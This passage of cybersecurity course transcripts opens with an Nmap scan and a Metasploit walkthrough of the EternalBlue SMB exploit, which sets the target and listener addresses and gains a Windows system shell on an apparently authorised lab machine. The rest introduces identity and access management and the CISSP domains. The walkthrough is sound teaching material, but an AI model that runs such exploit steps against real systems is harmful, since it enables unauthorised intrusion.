cloud, we're going to decide what we are going to do next, and we're going to see if NMAP alone can point us to a direction where we can gain access to the machine. As you can see, the scan is now completed, and we have some of the ports that are being opened over here and what kind of service they are running. Now, like we discussed, this is the first stage, or sometimes even the second stage, of ethical hacking. What we can infer from here is what are the services that are being run. Now, these two ports, 139 and 445, are actually Windows SMB server ports, which are above the Windows Samba server. Now, every service has a particular port attached to it that will be consistent whichever machine you may use. Apache server will always run on port 80. SMB servers will function on these two ports. Now, SMB servers have had a vulnerability known as the Eternal Blue exploit, which was pretty well known. As of right now, from the scan results, we are not able to detect if this machine has the similar vulnerability or not. But since it has the SMB server open, it's worth a shot that we try that exploit on this machine. Now, to start the exploit on this, we're going to open another terminal over here, and we're going to use Metasploit for trying the exploit there. We're going to write sudo msf console. Msf console is the keyword for launching the Metasploit console. Enter the root password and wait for Metasploit to launch. Other than the ports, we can also see that it has checked the host name of the system and the operating system as well. Now that the Metasploit is open, we're going to launch the exploit. Now, before launching, we're going to have to check what exploits are there for the Eternal Blue vulnerability. We're going to use exploit blue, and we're going to check what kind of results we are getting over here. As you can see, serial number 9, exploit Windows SMB MS17010 Eternal Blue. It was first disclosed in 2017 and SMB remote kernel pool corruption. Let's say we're going to use this particular exploit. Now, all of this may be confusing if you're not aware of Metasploit, but remember, this is the next stage of ethical hacking, which comes into the gaining access part. We're going to use exploit number 9, as we found above, to use exploit number 9. We're going to set a payload, which is our malicious code that will run on the victim machine. Now, we're going to check some options. As you can see, it has by default pointed it to the 445 port, since that is the port where SMB server can be accessed from. The parameter that's missing over here is rhost. The rhost is the IP address of the vulnerable machine, basically the machine in which we want to attack. Now, I'm going to use the set command to set the IP address. Now, if we check, we now have a victim IP address set. Another parameter that we can change is the lhost. This is basically the IP address of our own system where we are going to gain access. Now, if you remember, we had connected using a VPN. So we're going to be assigned a new IP according to the VPN. So if we write ifconfig and check this one, TUN0 is the VPN adapter. This is our IP address that we have been assigned in the server, in the network where the vulnerable machine is present. So we're going to copy this IP address. You're going to move over this workspace, and we're going to set lhost with that IP address. With that, our options are set. Now we're going to run exploit, and it's going to check if Samba server vulnerability is present. As you can see, it has written that the target is vulnerable to this particular exploit. It's going to send the malicious code, and the malicious code is set in the payload that you sent above. And we now have the shell command of the Windows machine. As you can see, C Windows System 32. To be sure that this is in fact this Windows machine that is being used, we're going to write ipconfig, which is a Windows only shell command. As you can see, this is the IP address that was assigned to the victim machine. Now, while the major part of this process was done on Metasploit, we would not have reached this stage had we not found out that the 139 and 445 ports are open, which basically pointed us that we can try the Eternal Blue exploit of the Windows Samba servers. Similarly, all the scans that we run serve as a preface to the actual stages or the actual hacking stages of the campaigns. This SV command was necessary because we could check what are the exact services that are being running. In some cases, if an Apache server is being run, there are particular versions which have particular exploits. Those exploits will not work on other versions. So we're going to have to check what particular version is being run and accordingly apply the exploit. That can be done in the Metasploit, or you can run some other tool. But what exact exploit we have to run and which vulnerability we have to target, that is where NMAP comes to help.
Hello everyone, and welcome to today's video on Introduction to Identity and Access Management, also known as IAM. Monitoring usage of corporate data and access to privileged information had been a daunting task before the advent of IAM. Encompassing numerous APIs, single sign-on frameworks, and data handling policies, IAM has established itself as a key component of every IT department. But how does it enforce these rules, and who are the key benefactors of these policies? What about the advantages of these frameworks and the workflow of these systems? We are here today to answer these questions. Let's take a look at some of the topics to be covered today. We start by learning about IAM, that is Identity and Access Management, from a surface level so as to put a clear idea of what it is. Next, we cover the general workflow and process of how IAM works. Moving on, we cover some of the tools that find their place in an IAM framework and are crucial components. Finally, we go through some of the advantages of the IAM, learning what makes them a lucrative deal for organizations. So let's get started by learning about IAM from a surface level perspective. Identity and Access Management, or IAM, is a set of processes, policies, and tools for defining and managing the roles and access privileges of individual network entities to a variety of cloud and on-premise applications. The users can include customers, partners, employees, devices like computers, smartphones, routers, etc. The core objective of IAM systems is one digital identity per individual or item. Once a digital identity has been established, it must be maintained, modified, and monitored throughout each user's or device's access lifecycle. Access and user are two vital IAM concepts. Access refers to the actions permitted to be done by a user, like view, create, or change a file. Users could be employees, partners, suppliers, contractors, or even customers. Furthermore, employees can be further segmented based on their roles. IAM systems are designed to perform three key tasks: identify, authenticate, and authorize, meaning that only the right person should have access to computers, hardware, software apps, any IT resources, etc. For the entry of new users or the changing of the roles of existing users, the list of access privileges must be up to date all the time. IAM functions usually fall under IT departments or sections that handle cybersecurity and data management. Now that we understand the importance of IAM in today's cybersecurity sphere, let us understand the process of this framework. We have multiple components that aid this process. Let's start by going through each of them individually. Principal is an entity that can perform actions on an AWS resource or any cloud management system. A user, a role, or an application can be a principal. It's always the principal who raises a concern to access or modify data on servers, serving as the first point of contact in the IAM workflow. Authentication is the process of confirming the identity of the principal trying to access the product. The principal must provide its credentials or required keys for authentication. This step can be further enhanced by multiple authentication factors and geologs, among other things. Once the identity is confirmed, the principal has the ability to view the data behind the wall of security and take the necessary steps. When it comes to requests, a principal then sends a request to the cloud management system specifying the action and which resource should perform it. In this step, the user can ask to modify, delete, edit, or affect other users in this particular bucket of organization by changing the data or the information. When it comes to authorization, it carries out the rest of an organization identity and access management processes once the user has been authenticated. Users are granted authorizations according to their role at an organization. The practice is referred to as Role-Based Access Control, or RBAC. Authorizations determine a role's resources and level of access in the network. These items may include systems, applications, file shares, printers, and more. For example, an accounting department employee who regularly works with payroll software must be authorized to do such. If authentication resembles a passport, these are the things your digital identity can access with it. While authentication is fully straightforward, authorizations and their management are far more challenging. Authorizations consist of a complex set of rules and policies and groups which are permitted explicitly configured per user account. With the working of IAM frameworks out of the way, let's cover some of the tools that these systems work on. SSO is an IAM tool that enables a user to log into an organization's properties and automatically be logged into a designed set of other properties. For example, when you log into Google, you're automatically logged into your Gmail and your YouTube accounts. Similarly, for users, single sign-on reduces friction since they don't have to keep track of different credentials for every application. For organizations, SSO helps in collecting valuable insights about user behavior and preferences since it tracks them as they move from one application to another connected by one single login. Next is multi-factor authentication, or MFA. Implementing multi-factor authentication is crucial to protect your organization's data from malicious intrusions, and virtually every IAM platform offers some form of MFA. However, it's equally crucial to customize MFA with the appropriate level of security. For example, in business-to-consumer scenarios, you need to consider UX and try not to create unnecessary friction for users who don't want to be subjected to heightened scrutiny every time they log in. For workforce IAM, you may want a more stringent MFA, since the consequences of an unauthorized party gaining access to your private network can be so devastating. A modern IAM solution will allow you to implement MFA only when it's needed. This can be accomplished through setup authentication or adaptive authentication, in which users only trigger MFA if they are trying to access sensitive data or their behavior is flagged as risky. In the past few years, identity has become the preferred gateway for hackers to break into systems. Brute force attacks, credential stuffing attacks, and even highly targeted phishing campaigns are all attempts by hackers to break in through a company's front door, which is the login box. There are multiple ways IAM systems can help detect and mitigate these malicious attacks. IAM solutions detect attacks by monitoring signals such as the velocity of traffic, detection of login patterns that differ from a user's routine, use of a breached password, use of devices and IP addresses with a poor reputation, among other things. These are some of the most widely used tools when it comes to IAM frameworks. But why do we go through setting up so many tools and firewalls? Let's go through some of the advantages of using IAM systems in both corporate and consumer environments. IAM solution helps identify and mitigate security risks. You can use IAM to identify policy violations or remove inappropriate access privileges without having to search through multiple distributed systems. You can also leverage IAM to ensure that security measures are in place to meet regulatory and auditing requirements. IAM provides a common platform for access and identity management information. You can apply the same security policies across all the operating systems and devices used by the organization. The IAM framework can help you enforce policies related to user authentication, privileges, and validation, and attend to the privilege creep problems. IAM simplifies sign-up and user management processes for application owners, end users, and system administrators. It makes it simple to provide and manage access and promotes user satisfaction. IAM services can also lower operating costs. Using federated identity services means you no longer need local identities for external users. This makes application administration easier. Cloud-based IAM services can reduce the need to buy and maintain on-premise infrastructure.
In this video, we will discuss what the CISSP is all about, the different domains that are covered in the CISSP course, what exactly do we mean by information security. Then we are going to have a discussion on vulnerabilities, threat, and risk. We are going to describe each and every term, and we are going to see how they are related to each other, after which we'll tie that up with discussing risk management, and we'll then identify the roles and responsibilities of the management in the information security space. So let's begin with the first topic of this video. What is CISSP? Now, the CISSP stands for the Certified Information Systems Security Professional. This is a gold standard in information security as far as certifications are concerned, and is normally gained by professionals with experience of more than 5 to 10 years and is more of a management related certification. This certification ensures that you have the requisite knowledge to become an information assurance professional, where you can implement security in an organization and an enterprise on an enterprise scale. For the exam, there are two ways to go about with the exam. Anyone can attempt the exam, but once you clear the exam, there is a verification that takes place from the ISC Square, which is the certification authority for CISSP, where you have to prove that you have at least 5 years of experience in the information security field in at least 2 of the domains that are specified under CISSP. If you do not have that experience, you can still get certified as an associate of ISC Square, and then they give you 6 years to complete the relevant experience that is required, after which you become a CISSP certified professional. The exam is quite difficult. It's known as a mile wide, inch deep exam because you don't have to be a master in each and every domain, but you have to understand and have the knowledge across all these domains that are specified. The exam is quite tough and people take a long time to ready themselves for this exams. The passing rate for the candidate in the very first attempt is well below 50%. Now, this should not be taken as a negative point. The reasons are plentiful because there are people who actually do not realize the exam itself or do not realize the seriousness of the exams. People without experience, without reading the requisite books, think that it's just going to be a theoretical exam, and thus they try to attempt it without being ready for it, right? When you want to take the exam, people study for months together and they solve a lot of question banks, ensure that they have the prerequisite knowledge. So they read a lot of books that are out there. Some of them are prescribed by ISC Square themselves. Others are from different authors that they try to give in more insight to certain topics. And then once they feel that they're ready, they would give the exam. I've seen people take question banks of at least 2,000 to 3,000 questions, ensure that they're scoring at least 80% in those test exams, and then attempt the exam itself. So in CISSP, as with every security course, we start off with the CIA triad. Now here CIA is confidentiality, integrity, and availability. So it starts off with every security mechanism. When we talk about security and we want to keep things secure, what is it that we want to secure? It is the data of an organization that is the most valuable asset to the organization, and that's what we want to secure. When we say that we want the data to be secured, we basically talk about 3 aspects for that data. The first and the foremost, that the data needs to remain confidential. The second aspect, that the data needs to be trustworthy. And the third concept, that the data should be available to all authorized users when and where they require it. So going back to the first point, when we say we want data to be confidential, what do we mean by that? By confidentiality, we talk about that data being made available only to authorized users after you have authenticated them, ensured or assured of their authenticity, and only then you're going to give access to that data, right? So even if you go into an organization has a hierarchy of governance, right? So only certain people with certain clearances or certain job titles can have access to certain amount amount of data, whereas other people may not have access to it. For example, a person working in the sales department will not have access to data that is accessed by the HR department. Thus, that's what we are looking at: classification of data and keeping it confidential, only making it available to those people who require it. When we say trustworthiness or the integrity of that data, the integrity is where the data has been altered, modified, removed, deleted by unauthorized people. So we want to prevent that, which means when we say we want the integrity intact, we want to ensure that only authorized people can modify, alter, or remove data if they are allowed to do so. So that's where the authorization and authentication comes into the picture again. And data needs to be available. For me to safeguard data, I can just lock it up in a safe, throw the safe in the depth of an ocean, and say that the data is secure because it cannot be leaked out. But that data is no longer available to authorized users, hence that data is useless. For me, data would have value when the data remains confidential, has its trustworthiness intact, and is still available to all the users that are authorized to access it. So when we talk about security, we want these three aspects to be implemented on any and every digital asset that the organization has, and thus once these 3 points are guaranteed or at least assured to a certain extent, we can then say that the data or that particular asset is secured. So when we talk about CISSP, what are the domains in CISSP as far as the exam and the certification is concerned, and how is CIA or information security related to it? So to start off with, there are 8 domains in CISSP. One starts off with asset security. Then you've got security architecture and engineering. Then we have communication and network security, identity and access management, security operations, security assessment and testing, software development security, and security and risk management. Alright, so talking about the 8 domains, the first one being security and risk management. This is from a governance perspective where we talk about the risk an organization would face, risk management a little bit, talk about compliance, laws, regulations that the organization has to look forward to or needs to adhere to. So if you look at from an organization's perspective, you are looking at a business objective that an organization has and how security can be aligned with the business objectives. For example, if you take an online retailer, or as we call them an e-tailer, and we want to look at how security is relevant to them, right? We first want to look at what are the compliances or what are the laws the country has in which they exist, and what laws do they need to adhere to. Could be corporate laws, could be computing laws, could be the Information Technology Act that we have in India, or the privacy acts that we have across the world, GDPR if that is required, regulations. For example, a financial organization would need to comply with GDPR if they're in Europe, or if they're in USA, California, there's a California Act that's there for privacy. The security that they want to deal with, so if they want to implement ISO 27001 on top of that, what are the requirements for ISO 27000? What is the scope of that standard that can be implemented in their organization? So they want to check on these laws, regulations, compliances, and they need to check which they need to implement and which they need to adhere to. And once they have identified that, they would look at the risk assessment. They would see where they are positioned right now, what are the risks that the organization faces as far as these laws, regulations, and compliances are concerned, how they can mitigate those risks with security, and once security has been implemented, how they can move on with the governance of that enterprise over a longer period of time. And then this is broken down into rest of the modules where you can first talk about asset security. So you first want to identify the assets of an organization. Could be physical assets like computers, servers, storage servers, switches, routers. See how they can be secured. Physical security comes into the picture as well. Then you want to look at digital assets like data that is being stored, classification of data maybe a little bit, where you have identified data, you have classified them as proprietary data, something that is trademarked, something that is copyrighted, etc. The value of those assets that the organization has towards them, and then how you're going to protect that asset based on the risk assessment strategy that you have identified in the first domain. Then comes with the third module, security engineering. Now this is where security by design starts as far as CISSP is concerned. CISSP always encourages security to be involved at each and every phase of the life cycle of an organization. So for example, the third domain will start off with enterprise architectures like TOGAF, and how security architectures like ISO 27001 or ISO 27002, 3, 4, 5 of any of these standards or COBITs, for example, can be implemented and integrated with the enterprise architecture, thus giving you a good security architecture right from the inception point. So the main aspect being security should not be bolted on, it should be secure by design, which means while you're creating it and implementing it, security should be implemented right from then. Then we move on to the next module, module 4, communications and network security. So in the previous module, you have identified the devices that you have talked about how the architecture of those devices would be, how data flows are going to happen, and then how you're going to secure those data flows. Then you come to the communication and networking part of it, how these computers or devices are going to interact with each other, which protocols are going to be utilized. The OSI layer comes into the picture, how you're going to secure yourself against various network-based attacks like ARP spoofing, MAC spoofing, IP address spoofing, sniffing attacks, man-in-the-middle attacks, and things like that. Now, this domain is slightly technical. It does talk about OSI layers, TCP and UDP, but it doesn't go in depth about technicalities about how attacks are created or how attacks are executed, right? So that's something that this training doesn't deal with. So this is not a hacking training where you're actually going to learn how to hack. It's basically an overview of what threats or risks a network or a communication protocol may have, and thus you're going to identify the relevant security controls and implement them on those particular levels. So for example, in this mechanism, I want the OSI layer, which has 7 layers, right from the physical layer to the application layer, and then I want to identify a particular attack and which layer it affects, and thus want to have an appropriate security control to monitor that layer so as to mitigate that particular attack, right? So it's semi-technical, if you will, where you need to understand the OSI layer and the protocols, but you don't need to execute those attacks at all. Then comes the identity and access management. So if you've seen, if we go back to security and risk management, and we have talked about CIA, confidentiality, integrity, availability, and then we have talked about identifying assets, engineering with security as a design, networking and all those. Now, when we come back to confidentiality and we want to keep these things confidential, how do we do that? The first thing is identity and access management. So who is allowed to access what, to what extent are they allowed, and what are they authorized to do? Are they allowed to modify those particular data points, delete, remove them, or add to them, edit them, etc. So who's authorized to do what? And once they're authorized, you want the authentication mechanism to come in. So we come back to the IAAA standards: identification, authentication, authorization, and accountability. So when I say I want user who has been through the identity and access management process, and only then will they be allowed to access, that's where your user management comes into the picture. For example, let's take Gmail. Everybody accesses Gmail. What is it that you first do? You open up a browser. That's where your asset security comes in, the browser becoming that asset where you need to secure it. So you secure it by having anti-phishing toolbars, maybe an antivirus and things like that. The security engineering coming into the picture where you have integrated a particular browser with some particular extensions, how the browser is going to communicate using HTTP, HTTPS, right? And then when you go to Google, you use the identity and access management module. So it first asks you to identify yourself by using your username. So you type in your email address, that's your identity. So that's the IAAA identity coming into the picture. Then it asks for authentication, which is your password. You may have enabled multi-factor authentication at that point in time. So once you put in the password, if it's single authentication mechanisms, you enter it, and then that's where your authentication process comes into the picture. After that is the authorization process. What are you authorized to access as a user? Do you get access to the entire Gmail server? No, you only get access to the email account that you have been authorized to access. Within that, if you're an administrator to that account, you can do whatever you want, and they are still monitored. That's where the accountability part comes into the picture, where if you do something illegal, you may be penalized for it. So that's the identity and access management module that comes into the picture. Now, with the browser, I've just given you a very basic example, but as you go into a larger scenario, we are looking at enterprises and you're looking at security over different assets like storage, databases, and so on and so forth. It becomes a huge task to have an identity access management module implemented. Then comes the next domain called security operations. So that's where your day-to-day operations like a SOC, a security operations center, comes into the picture. So incident management, disaster recovery, your investigations, forensics of what attacks have happened. So your security operations centers might be the day-to-day activities that you deal with, let's say an IDS, IPS, firewalls, antiviruses, and it's basically a structure of how you're going to build an exercise to manage incidents as and when they happen. So it's basically more of a operation scenario where you're looking at the day-to-day health of an organization rather than looking at an overview of the security of an organization. Then comes security assessment and testing, which is basically your secure development lifecycle, or SDLCs as they are known, where you'll be looking at how you can assess applications, where you'll be looking at SAST, DAST, or dynamic application security testing, static application security testing, and so on and so forth. So here you're either procured an application from a third party and you want to test that application to see how it is going to, or what risks it is going to expose your business to, or you're developing an application and you want to involve security right from the inception. So if you're looking at that, then you can move on to the next domain where we talk about software development security, which talks about different software development lifecycle models like waterfall, agile, spiral models, and so on and so forth. So if you look at the 8 domains, they basically start off with the governance, where they talk about security and risk management, and they go to each and every aspect of your information technology and give you an overview of how security should be implemented right from the inception and build up from there to the execution level. Now the exam and these domains are built in a ideal world, not a real world scenario. So there are a few assumptions over here where you assume that you have all the required resources, you have all the required people to do those jobs, you're living in an ideal world, you've mapped all the roles and responsibilities properly, and then you're talking about these 8 domains. In the real world, things are quite different, and people who have got real world experience kind of struggle to map all those things as far as an ideal world is concerned. And that's where your reading and your understanding of these concepts come into the picture. Moving on, let's talk about information security. Information security is the process of protecting data and information systems. So in the CIA, as we talked about it, when we said what do we want to protect, we want to protect all the information assets or the technical assets that we have from any of the vulnerabilities that can be identified. So we want to restrict unauthorized access and use. We want to restrict deletion, accidental or intentional, if they have not been authorized to do so, modification of data, so the integrity part, and destruction of data. Destruction could not only be deleting data, but it could be something like a ransomware where the data gets encrypted, so it's still there, it's just not accessible to you. Now, information security ensures the implementation of these following aspects. The first and foremost comes from information security policies, which is the governance aspect of it. The policies are designed to have a implementation of security in an organization that helps the business processes to be executed in a secure manner. Where are these policies coming from? They come from standards or guidelines which are globally available and based on which we can start developing our security policies. For example, if I want to develop a security policy in my organization, I might want to depend on frameworks like ISO 27001, COBIT, or something similar. Once I have these standards set, I would come back to procedures. Procedures being how are these standards to be executed. Right? For example, in my policies, I ensured that I want encryption of AES 256 to be implemented, or rather in the policy, I determined that we want encryption to be implemented on a data set based on the classification of those data. So in my policies, I would determine how the classification is going to work, how data is going to be classified on what parameters, and thus once the data gets classified, we are going to come back to standards where we say if it is classified as confidential data, we want to use encryption to protect that data. And we want AES 256 to be utilized for encryption. So how do we go about it? How do we implement the encryption? That's where your procedures come into the picture. Your guidelines are troubleshooting mechanisms, optional documents. So if somebody has trouble following the procedures, they might want to go into the guidelines and see how to troubleshoot the scenario that they are facing. Baselines are basically the minimum achievable target that you want to go with these policies. So let's say when I say I want to have a baseline on a server where for the server to be published onto the internet or to be used in production environment, it has to meet a certain criteria, which means I can go back to the hardware and I can say the server needs a hardware configuration of X, Y, and Z. Let's say a processor, a Xeon processor with 16 cores, 128 gigs of RAM. So that's a baseline that I need for a particular server for it to be put into production environment for a particular use. Anything above that is acceptable, but nothing should go below that. Then comes the risk management. While we are implementing these policies, procedures, we have those standards in place. If we face any risk during that period, or if we face any threat or a vulnerability is identified during this period, all these terms we are going to discuss in a little bit. So when we identify vulnerabilities or threats, that's where our risks come into the picture. The risk management comes in saying, okay, this is a risk that we have identified, and now how do we want to mitigate the risk? Then the security organization comes into the picture, the day-to-day activity of how security is to be implemented. And for all of these procedures, policies, baselines, standards to be implemented, to be ensured that to be assured that they are working properly, we need to make our employees aware that these policies exist. This is something that they need to follow. Thus, the awareness or the security education comes into the picture. Here, the security education is more focused on helping employees adhere to the company policies and standards rather than educating employees about security. We don't want to make everybody an ethical hacker. We just want to ensure them or we want to assure the organization that everybody has been warned about policies, procedures, security requirements, and they are going to follow those requirements. For example, a password policy where you have to adhere to a specific password policy to ensure passwords are created. At the same time, there is another password policy which says that you should not share passwords with your colleagues no matter what. So for me, for my employees to follow that, I need to make them aware that these policies exist and there are repercussions if they do not follow these particular policies. So coming back to the governance part, what is governance since we have been talking about it? Governance ensures that the security strategies are aligned with business objectives and consistent with regulations. So what does it guarantee? Appropriate information security activities are being performed. Based on what? Based on the policies that we have created, based on the standards that we have and the baselines that we would have created. So security has to be comparable, right? So if I say I have secured against particular attacks, the attacks have to be identified, and then compared to those particular attacks, I can say I have mitigated these activities by having specific security controls. Thus, I can say that I am secure. The governance aspects keeps a watch on all these security controls to see that those security activities are ensured, are being implemented, and are performing to the best of their abilities. That's where your governance comes into the picture. The risks being reduced, so the risk management also comes under the governance, where you're looking at newly identified risks and you're then implementing security controls that would mitigate these risks. Then we are looking at information security investments appropriately directed. So when I say I want a security control, which would be a firewall, IDS, IPS, antiviruses, whatever is required, it needs to have a return on investment which is acceptable for the organization. You don't want to spend up too much of money in security, thus creating losses for the organization. When you say a business objective is always to make money rather than lose money. So security should be a supporting feature to the business objectives, where the services are being provided by the business in a secure manner in such a way that they can still have a positive return on investment on the services that are being provided. And the executive management can determine the program's effectiveness. This is the major part, because we have to, even in any compliances, audits, technical audits, we have to prove that whatever we have implemented actually works, is effective, thus mitigating the risk. If your security controls are not effective, then you have just wasted a bucket load of money and have not achieved any security measures in your exercise. Moving on to security controls. Security controls are measures taken to safeguard an information system from an attack, basically for the CIA triad, the confidentiality, integrity, and availability. So security controls could be administrative controls, technical controls, or physical security controls. What are administrative security controls? They would be policies, procedures that we have in place. So the password policy becomes an administrative control where the management has made everybody aware that the password needs to meet a particular complexity, should not be shared, and thus becomes an administrative security control. A technical security control would be where we are implementing this policy, and thus when I try to create a password, there is a software that maps the password to the complexity requirements, assures or ensures that the complexity requirements have been met, and thus allows the password to be accepted or rejects the password as the case may be. That is a security control. A physical security control may be, let's say, a CCTV camera which you're going to use to monitor people and ensure that nothing untoward happens. It's not only against physical crime, but let's say access to a particular room where nobody is seen tailgating. Maybe monitoring a server room which is very well secured and ensuring that unauthorized people do not get access or purposefully or intently do not access that area at all times. So these are the three levels of security controls that can be implemented to enhance the security of an organization. Then we come to security policies. Policies is an overall broad statement produced by a senior management that dictates the role of security within the organization. For example, the password policy that we talked about, it just said that it needs to meet a certain complexity, which is a broad statement that is being made by the management saying we want to adhere to this policy to ensure that we do not get hacked by brute force attacks or dictionary attacks or whatever it is. The broad statement is trying to prevent certain attacks from happening on the organization. How it is implemented, that's where the procedures and everything else comes into the picture. It must integrate security into all business processes. So if I start creating a policy which ensures that the complexity should be so high that the password should be at least 20 characters strong, that would be detrimental to the organization's health because people may not remember those passwords, or resetting those passwords, or having technical mechanisms, technical security controls in place to implement that kind of stringent security may be too expensive to have. So whatever policies are created, they need to be in line with the business processes as well. The policy must be reviewed and modified periodically or as company changes. So as and when the company becomes more mature and can have more levels of security, they must look at their policies again and redefine them. Or as a company grows or changes market scenarios or changes business processes, these policies may become redundant. So you want to look at those policies and implement newer policies or modify the existing policies to suit the business processes in a better manner. It must support vision and mission of the organization. A business once established will always have a long-term vision. For example, the e-tailer example that we are talking about, for me to open an e-retailing website, I don't want it to be periodic. I don't want it to be for a month or something like that. I want to achieve success in that factor, and I want to create a plan of where I want to reach, let's say in the next 5 years. So how do I achieve that? That's something that I need to plan as a business plan. All my security mechanisms that are in place should be in alignment with the business plans, business visions across the number of years that we have envisaged the business to perform. So that's where the policies come into the picture. Policies are always long-term, not short-term documents, but need to be periodically reviewed and modified as the business grows or business changes its posture. Then looking at compliance. Compliance means conforming to a rule such as a specification, policy, standard, or law. So we have looked at compliance from a perspective where we talked about ISO 27001 or PCI DSS or those frameworks. Now these are not laws, but these are standards or frameworks that have been created over a period of time through experience. And these are targeted towards organizations, towards specific industries. For example, PCI DSS is only towards finance organizations where they have payment gateways in place. The ISO 27001 is a more generic policy which can be implemented by various organizations. HIPAA, Health Insurance Portability and Accountability Act, is an American act that talks about health-related data of its citizens. So these are compliances. These may not be laws, but you need to adhere to these to be effective and to be allowed to conduct business in that particular industry. Then we have Code of Ethics. Code of Ethics state safety of the Commonwealth, duty to our principles and to each other requires that we adhere and be seen to adhere to the highest ethical standards of behavior. Therefore, strict adherence to this code is a condition of certification. What are the ethics? Protect society, the Commonwealth and the infrastructure, act honorably, honestly, justly, responsibility and legally, prove diligent and competent service to the principles, advance and profession. Now, the Code of Ethics are codes created by ISC Square for the CISSP professional, and you need to adhere to these codes. If they identify violation of these codes from any member, they would debar the member, strip them of the certification, and even blacklist them based on whatever ethics they have violated. So even before the exam, you have to go through the Code of Ethics. You have to accept the Code of Ethics. In the exam, you may get up to 5 to 6 questions just on Code of Ethics. Then comes the legal systems. That's where the law comes into the picture. Law could differ from country to country or from region to region, and thus, depending on which country you're in, you may need to be aware of those laws of those countries. As far as CISSP is concerned, ISC Square is concerned, they are an American organization, so they would talk about mostly American laws and a few European laws or directives as well. So there are 3 different laws that we talk about: civil, common, and religious laws. Depends on the country, the culture of that particular country. The information security professional should understand the different legal systems followed internationally. So you also may come across the classification as civil law, criminal law, and law of torts. Civil law is basically a law where, let's say, a contract has been breached and it's not criminal in nature. You just want to sue an organization for breach of contract. Criminal law is where something criminal has happened under the particular act of that particular country, like let's say a murder or an attack that has happened, a physical attack, or something got stolen. And the third one was the law of torts, where it's more of a compensatory law where you can file a case, a civil suit, demand compensation in lieu of the wrongs that have happened to that particular organization. or that individual. Then comes the personal security. The people inside the organization need access to data to complete their assigned work and hence have the potential to misuse these privileges. And thus, you should have personnel security as well. Now, when we talk about hiring practices for people, most of the organizations perform background checks, and we get confused why these background checks are being done. The background checks are essential to the health of the organization, where you are ensuring that the person is not a malicious person, has the prerequisite certifications or the qualifications, have never been debarred or have never been prosecuted, do not have a criminal background, thus preventing physical attacks on the organization. For example, a competitor may attempt to place in your organization a spy to gather information on the secrets of that organization and report it back to the competitor. A background check may reveal that this person was previously employed by a competitor, and thus you might want to verify that how that employment got terminated, when did it get terminated, or is this person misusing anything or misrepresenting any aspect of his or their life. Then you also need to get confidentiality agreements signed with them. For example, NDAs, non-disclosure agreements, data that is being shared with them, the ownership of that particular data, and what are the repercussions if that confidentiality is breached by that particular person. Conflict of interest agreements for positions handling competitive information. As you go higher up in the organization, you might come across contracts where it prohibits a particular person in engaging into the same activity with a competitor for a particular period of time. So if there is a conflict of interest when you're hiring a person where they have signed such a agreement with another competitor or another organization, you don't want to embroil yourself in a lawsuit where the other organization may sue you for hiring a person while they were still under that particular contract. So it's not only to look at the background of these people, but to safeguard the organization from any lawsuits or any violations of contract as well. Get the non-compete agreements for the positions in charge of unique corporate processes. That again goes on to say if you're going to leave the organization, you cannot start up a competing business similar to the organization's business, and so on and so forth. Now let's come back to the technical aspect and start talking about vulnerability, threats, and risk. Now, what is a vulnerability? It is nothing but a weakness in a system or a process, implies the absence of a countermeasure. Vulnerability is internal and is more easily managed. So it's basically a flaw or a misconfiguration or a design flaw or something like using defaults, username, passwords, configurations, where if that particular flaw is misused, it will lead into a security event on that particular device for that particular organization. So when we say a security event, it has to be detrimental in nature. So if somebody is using a weak password that can easily be cracked, that is a vulnerability where you have identified a weak password, and then you want to prevent that vulnerability by imposing a security control or a countermeasure. The security control here starts off with the policy of having a robust security policy where a password policy comes in that describes the complexity of a particular password. And then you talk about a technical countermeasure where you have implemented an identity and access management plan, which would ensure that the person creating that password adheres to the complexity of that particular policy. Then a threat. The threat is the possibility that the vulnerability might be exploited, which will result in loss. So if somebody has created a weak password and it has been allowed, that's a vulnerability which can be exploited by the usage of brute force attacks or dictionary-based attacks to crack passwords. If the password is cracked, somebody unauthorized may get access to that data, thus resulting in a loss for that organization. So the threat is the possibility of that particular vulnerability being exploited. And then comes the risk. The risk is basically the likelihood of that attack being happened. So I have a weak password. It can be exploited by a brute force or dictionary attack. The likelihood of that attack is what determines the risk level for me. Now the likelihood will always be hypothetical, but we don't want to run helter-skelter and we do not want to take the possibility to extreme. So that's where your business processes come into the picture. Your security policies come into the picture. Based on the business processes and the policies implemented, if I have a weak password, what would be the loss that I would face for that particular person? For example, a fresher coming into an organization, having a weak password, but having limited access to data would have a lesser risk because of the loss being lesser than a CEO of an organization using a weak password and thus getting exploited, because the CEO will have access to more proprietary data that if gets into the competitor's hand would lead in huge losses. Thus, the same risk of having a password cracked for a fresher will have a lesser loss, thus a lesser risk compared to the same risk to a CEO where the loss would be higher. So a threat could also be in multiple aspects. Threats could be natural, that means to fires, flooding, tornadoes, anything that is an act of God that can happen with minimal human interaction. Or the second threat would be man-made, where man is responsible for it, like theft, hacking, rioting, war, anything that is created by a man, or rather humans. And technical in nature could be software bugs where vulnerabilities are created, or server failures where something technical has gone wrong and you need a technical skilled person to come in and repair that particular aspect. Then the fourth one would be a supply system failure or a chain supply failure where you have dependencies. For example, any organization will have a dependency on an electricity service provider where they are providing electricity as a service which powers on the IT infrastructure. If the service provider fails and there is an electricity or a power cut, your systems are not going to work. Thus, you need a secondary mechanism to prevent that threat from being realized. Once we have identified these threats, we have identified these vulnerabilities, and we have identified the likelihood and the probability of that attack, that's where we come across the risk management exercise. Now, what is risk management? Risk management is a hypothetical exercise where we have identified a vulnerability, we have looked at the threat that it may have, and the likelihood of that threat being realized. Once we have identified the threat, the risk level, that's where the risk management comes into the picture. Reading from the slides, a core component of enterprise security program. Why? Because we need a baseline and we compare security to a baseline. For example, I've got a firewall that has been configured in a particular manner. Now, when I do a vulnerability assessment on the firewall, the vulnerability assessment gives me a report that states that some of the rules may now be redundant, thus allowing access to unauthorized users. This becomes a risk, or this becomes a threat. If this threat is identified by unauthorized people, they would then try to attack this firewall to gain access to that data which they are unauthorized to access, thus leading to losses for an organization. What is the likelihood of this happening? If the likelihood is high or low, that's what the risk management program is all about, right? And based on these risks, we implement security controls, we manage the security controls, and then we verify the security controls for future risks to coming into the picture. It must be defined, and it is always defined as an ongoing project because risks will always change based on the businesses, based on the security controls that you have. This will give a guidance to an organization of how security is being implemented, how it has enhanced over a period of time, and how security mature that organization has become because of the risk assessment program. It also helps you to satisfy two aspects: due diligence and due care. What is due diligence? Due diligence is basically the research that organization does in identifying those risks and mitigating them. The due care is the actual part of mitigation where you have implemented a security control to mitigate the risk that you have identified. So if company is negligent, that means if the company doesn't have a risk management program, it is not going to be that security oriented, or the security is not going to be that great. Thus, the company may not comply to laws, regulations, and standards, thus causing them penalties, lawsuits, and other repercussions in the 